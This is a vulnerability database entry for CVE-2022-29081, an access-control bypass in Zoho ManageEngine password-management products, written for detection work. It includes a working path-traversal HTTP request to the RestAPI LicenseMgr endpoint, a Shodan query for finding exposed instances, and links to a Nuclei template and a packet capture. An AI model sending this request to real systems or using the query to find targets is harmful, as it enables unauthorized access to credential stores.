🔙 목록으로 돌아가기

CVE-2022-29081: Zoho ManageEngine - Access Control Bypass

TitleZoho ManageEngine - Access Control Bypass
Author0xanis
SeverityCritical
ImpactAttackers can bypass access controls on REST API endpoints, potentially leading to unauthorized data access or manipulation.
RemediationUpdate to the latest versions of Access Manager Plus, Password Manager Pro, and PAM360 that address this issue.
CVSS Score9.8
EPSS Score0.81477
CVE IDCVE-2022-29081
CWE IDCWE-22
Shodan Queryhttp.title:"manageengine"
Tags cve cve2022 zoho manageengine auth-bypass vkev

🔍 Vulnerability Description

Zoho ManageEngine Access Manager Plus before 4302, Password Manager Pro before 12007, and PAM360 before 5401 are vulnerable to access-control bypass on a few Rest API URLs (for SSOutAction. SSLAction. LicenseMgr. GetProductDetails. GetDashboard. FetchEvents. and Synchronize) via the ../RestAPI substring.

🌐 HTTP Request

POST /x/..//RestAPI/LicenseMgr HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (CentOS; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Connection: close
Content-Length: 27
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

operation=getLicenseDetails

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-29081.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-29081.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A